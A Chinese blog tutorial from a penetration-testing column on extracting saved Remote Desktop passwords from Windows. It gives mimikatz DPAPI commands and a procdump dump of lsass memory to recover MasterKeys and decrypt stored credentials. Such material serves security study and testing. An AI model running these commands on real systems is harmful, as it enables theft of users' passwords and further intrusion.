Windows 远程连接记录获取

最新推荐文章于 2024-07-31 09:49:01 发布
最新推荐文章于 2024-07-31 09:49:01 发布
阅读量8.1k 收藏 3
点赞数
分类专栏: 内网渗透 文章标签: 服务器 渗透测试 cmdkey 后渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingzhantianxia/article/details/123413571
版权

简介

远程连接时,会将远程服务器的用户名和密码保存在本地的,所有可以通过解析相关文件,解密出相关凭证

本地获取

使用以下命令就可以查看本地保存的凭证,每个文件都是对应的一个远程连接的密码

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\

在这里插入图片描述
mimikatz使用以下命令

privilege::debug

dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\ED00E791ECC7D85650284F3D20BD6BC2

查看到guidMasterKey的值

在这里插入图片描述

然后执行

sekurlsa::dpapi

根据对应的giudMasterKey 的值,找到对应的密钥,进行解密即可
在这里插入图片描述

解密

dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\ED00E791ECC7D85650284F3D20BD6BC2 /MasterKey:d19dda6b421f0faef1a0c5233f28e6c6eea4adeb323b86aa3305fe35dc66ef906dc32783ea8c13a0889fbe4934128db70e7b596951db612dcb24d12bb269ae0a

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8ptDh91d-1646923417264)(E0BE3D28046C4A9E8640163E1BC1C1AE)]

下载解密

下载 C:\Users\Administrator\AppData\Local\Microsoft\Credentials 下的文件,获取对应的guidMasterKey

dpapi::cred /in:ED00E791ECC7D85650284F3D20BD6BC2

使用 procdump 下载lsass.exe内存的内容,获取对应的 MasterKey

privilege::debug
sekurlsa::minidump lsass.dmp

解密

dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\ED00E791ECC7D85650284F3D20BD6BC2 /MasterKey:d19dda6b421f0faef1a0c5233f28e6c6eea4adeb323b86aa3305fe35dc66ef906dc32783ea8c13a0889fbe4934128db70e7b596951db612dcb24d12bb269ae0a

注:只有当用户登录时才能从内存中获取对应的 MasterKey ,需要下载多次

参考:

https://www.cnblogs.com/Mikasa-Ackerman/p/huo-quWindows-yuan-cheng-zhuo-mian-RDP-lian-jie-ji.html
https://www.cnblogs.com/Thorndike/p/15325079.html
https://cloud.tencent.com/developer/article/1861370
https://github.com/peewpw/Invoke-WCMDump.git

3.13-WindowsRDP凭证的抓取和密码破解
qq_38122566的博客
03-12 949
Credentials的解密是Windows系统信息收集中非常重要的一环,其中包括各类敏感、重要的凭证(这个可以理解为密码),接下来我们就讲解RDP凭证的抓取和破解。在我们点击保存密码后,Windows就通过MasterKey将我们的密码加密后保存在本地,由于Windows还需要解密从而使用,所以这个过程是可逆,也正因为这一缘由,我们只要拿到MasterKey就能将密码解出来。
远程桌面 mstsc 密码
06-08
远程桌面 mstsc 密码生成工具 网上说明的内容太多,我只想来个更简单的。通过输入地址,用户 和密码 即可 创建一个永久有效的远程连接了。
远程桌面密码查看器
09-08
远程桌面密码查看器
windows 怎么查看本地存储的远程连接密码_安全服务之安全基线及加固(一)Windows篇...
weixin_39524147的博客
11-24 4138
一个热爱分享的公众号和一群热爱这个行业的作者们。此文章为连载文章0x01 前言安全服务工程师大家应该都知道,对于他的岗位职责你可能会说不就是渗透测试啊、应急响应嘛.....实际上正式一点的企业对于安服的要求是包括了漏洞扫描、安全基线检查、渗透测试、安全加固、日志分析、恶意代码检查、应急响应、安全加固等差不多十个方面的内容的。内容多吗?我也觉得多!对于基线加固说,不管是对于安服还是安全运营...
win10远程桌面计算机用户名,win10系统远程桌面保存密码的方法
weixin_42348880的博客
06-22 2379
Win10系统自带有远程桌面连接功能,登录远程的时候都会有账号和密码,为了方便下次不用输入密码,会选择保存记住密码,但修改密码后就无法登录了,导致密码无法修改出现错误,如何解决呢,就此问题,下面小编教你win10远程桌面如何保存密码远程桌面连接功能想必大家都不会陌生吧,很多用户为了服务器的安全每次都会把密码设置的很复杂,但是这样也有一个麻烦,就是每次要桌面远程连接的时候都要输入这么复杂的密码,其...
获取windows10远程桌面记录的用户名密码
阿拉丁的知识分享库
06-06 6461
Windows 密码恢复工具双击netpass.exe,点击File,点击Advanced Options,按照如下图选择
实战案例分析:远程桌面密码获取(附内网各个密码获取方式)
最新发布
m0_37867238的博客
07-31 5976
这期我们就来说说在不制作镜像的情况下,如何直接获取windiws系统下的连接过且保存远程桌面密码,以及各类内网密码获取方式。
[内网]RDP远程桌面密码凭证获取
Keepb1ue的博客
05-15 1万+
通过密码文件获取guidMasterKey的值,根据guidMasterKey找到对应Masterkey通过Masterkey进行解密,获取明文。
远程桌面连接保存登陆用户以及密码(凭据)备份方法
热门推荐
weixin_33845477的博客
07-14 1万+
凭据保存备份有两个部分,一个是远程桌面连接的历史记录,这些记录保存在注册表下, HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default 只要将这部分注册表导出备份即可,但是导出这个只有历史记录,并没有凭据信息,也就是保存的登录帐号密码,而这些信息是被存放在另外一个神奇的地方   于是第二部分就是导出系统的凭据...
Python-获得Windows系统的远程桌面连接历史记录
08-10
在IT领域,特别是系统管理和自动化任务中,了解如何获取Windows系统的远程桌面连接历史记录是非常有用的。...在实际应用中,还可以根据需要扩展这个脚本,例如添加过滤条件,只显示特定时间段或特定用户的连接记录
mstsc-3389-rdp文件中密码的生成
03-03
先将之前登录的信息另存为RDP文件,在用记事本等文件打开在最下面加入下面两行。 username:s:你的用户名 password 51:b:软件算出的HASH值 保存后就可以直接双击打开了。
远程桌面登录工具-可保存密码,下次直接调用
02-27
1、windows自己的登录工具不能保存密码,有自己的缺陷 2、这个登录工具可以输入密码,另存为别的名字,下次登录调用时就不需要输入密码了,非常方便
Win7删除远程连接记录的方法
10-24
因此,了解如何删除远程连接记录对于保护系统安全至关重要。 首先,我们可以使用注册表编辑器来删除远程桌面连接记录。步骤如下: 1. 按`Win + R`键打开“运行”对话框,输入`regedit`并按回车键,这将启动注册表...
删除远程连接记录.rar
09-23
"删除远程连接记录.rar" 是一个压缩包,其中包含一个批处理(BAT)脚本,用于自动清除与远程桌面连接相关的各种历史记录,以保护用户隐私和增强系统安全性。以下是该主题涉及的主要知识点: 1. **远程桌面连接**:...
windows 远程连接debian_Windows远程连接Linux
weixin_31560545的博客
12-29 967
目录xrdp方式----------------------------------------------------------------------------------------------------------------------------------------------------------一般情况下我们用ssh客户端远程登陆inux系统,至于图形界面下的linux...
【家庭版windows远程桌面连接攻略】
m0_46343087的博客
01-24 2280
由于放寒假回家只能带笔记本,又想使用学校实验室里连接校园网的性能较好的台式机,研究许久终于成功,故记录连接方式。 可实现win系统家庭版下,同一局域网(同一wifi)、不同局域网下的远程桌面管理,比向日葵等远程连接软件丝滑的多
mstsc远程桌面连接清除历史
qq_21718533的博客
07-17 3593
Windows自带mstsc远程桌面连接,用的时间长了后,记录会越来越多,有些服务器已经不在使用,或者IP已经变化,但是仍然还保留着记录,以至于添加新的服务器都无法记录IP
windows远程桌面_保存密码
huoyuanshen的博客
03-18 3735
1,win+r  ,输入mstsc,进入远程桌面连接 2,点击左下脚选择“选项”,输入账户,进行保存。 3,输入密码,进行保存
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值